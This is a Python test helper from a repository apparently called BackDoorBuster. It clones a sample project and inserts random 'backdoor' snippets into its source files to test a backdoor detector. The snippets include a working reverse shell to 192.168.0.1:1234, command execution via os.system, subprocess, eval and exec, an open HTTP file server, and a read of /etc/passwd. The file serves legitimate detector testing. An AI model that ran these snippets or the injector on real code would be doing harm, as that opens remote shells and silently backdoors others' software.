sangge/BackDoorBuster
sangge/BackDoorBuster
1
0
Fork 0
Code Issues Pull Requests Projects 1 Activity
BackDoorBuster/tests/final_tests_util.py

180 lines
4.2 KiB
Python
Raw Blame History

from typing import Tuple
from git import Repo
import random
from pathlib import Path
def clone_repo(repo_url: str, clone_dir: str) -> None:
"""
Clone a Git repository to the specified directory.
Args:
repo_url (str): The URL of the Git repository to clone.
clone_dir (str): The directory where the repository should be cloned.
"""
try:
Repo.clone_from(repo_url, clone_dir, depth=1)
except Exception as e:
print(f"Error cloning repository: {e}")
def inject_random_backdoor(
path: str, pickle: bool = False, pyc: bool = False, sample_rate: float = 0.1
) -> int:
"""
Insert random backdoor into the path.
Args:
path (str): The path to the repository to insert the backdoor into.
pickle (bool): Whether to insert a backdoor into a pickle file.
pyc (bool): Whether to insert a backdoor into a compiled Python file.
"""
if pickle:
inject_pickle_backdoor(path)
if pyc:
inject_pyc_backdoor(path)
project_path = Path(path)
all_python_files = list(project_path.rglob("*.py"))
injected_python_files = []
for python_file in all_python_files:
# sample files to inject backdoor
if random.random() < sample_rate:
injected_python_files.append(python_file)
injectedNum = len(injected_python_files)
for python_file in injected_python_files:
with open(python_file, "r+",errors="ignore") as f:
lines = f.readlines()
total_lines = len(lines)
inject_line_number = random.randint(0, total_lines)
inject_code = random.choice(backdoors)
lines.insert(inject_line_number, inject_code + "\n")
# Move the file pointer to the beginning of the file
f.seek(0)
# Write the modified content back to the file
f.writelines(lines)
return injectedNum
# 示例1: 通过 os.system 执行命令
backdoor1 = """
import os
os.system('ls')
"""
# 示例2: 通过 subprocess 模块执行命令
backdoor2 = """
import subprocess
subprocess.call(['ls', '-l'])
"""
# 示例3: 打开一个反向 shell
backdoor3 = """
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.1",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
"""
# 示例4: 通过 eval 执行任意代码
backdoor4 = """
code = "print('Hello, World!')"
eval(code)
"""
# 示例5: 通过 exec 执行任意代码
backdoor5 = """
code = '''
import os
os.system('ls')
'''
exec(code)
"""
# 示例6: 简单的 HTTP 服务器后门
backdoor6 = """
import http.server
import socketserver
PORT = 8000
Handler = http.server.SimpleHTTPRequestHandler
with socketserver.TCPServer(("", PORT), Handler) as httpd:
print("serving at port", PORT)
httpd.serve_forever()
"""
# 示例7: 读取并显示文件内容
backdoor7 = """
with open('/etc/passwd', 'r') as file:
data = file.read()
print(data)
"""
# 示例8: 无限循环
backdoor8 = """
while True:
print("This is a backdoor.")
"""
backdoors = [
backdoor1,
backdoor2,
backdoor3,
backdoor4,
backdoor5,
backdoor6,
backdoor7,
backdoor8,
]
def inject_pickle_backdoor(path: str) -> None:
"""
Generate a pickle backdoor and insert it into the specified path.
Args:
path (str): The path to the repository to insert the backdoor into.
"""
pass
def inject_pyc_backdoor(path: str) -> None:
"""
Generate a pyc backdoor and insert it into the specified path.
Args:
path (str): The path to the repository to insert the backdoor into.
"""
pass
def check_accuracy(report_file: str, backdoor_location: Tuple[str, int]) -> float:
"""
Check the accuracy of the backdoor insertion.
Args:
report_file (str): The path to the report file.
backdoor_location (Tuple[str, int]): The location of the backdoor in the repository.
Returns:
float: The accuracy rate of the backdoor insertion.
"""
accuracy_rate = 0.0
return accuracy_rate
if __name__ == "__main__":
repo_url = "https://github.com/TheAlgorithms/Python.git"
clone_dir = "/tmp/repo"
clone_repo(repo_url, clone_dir)
Reference in New Issue View Git Blame Copy Permalink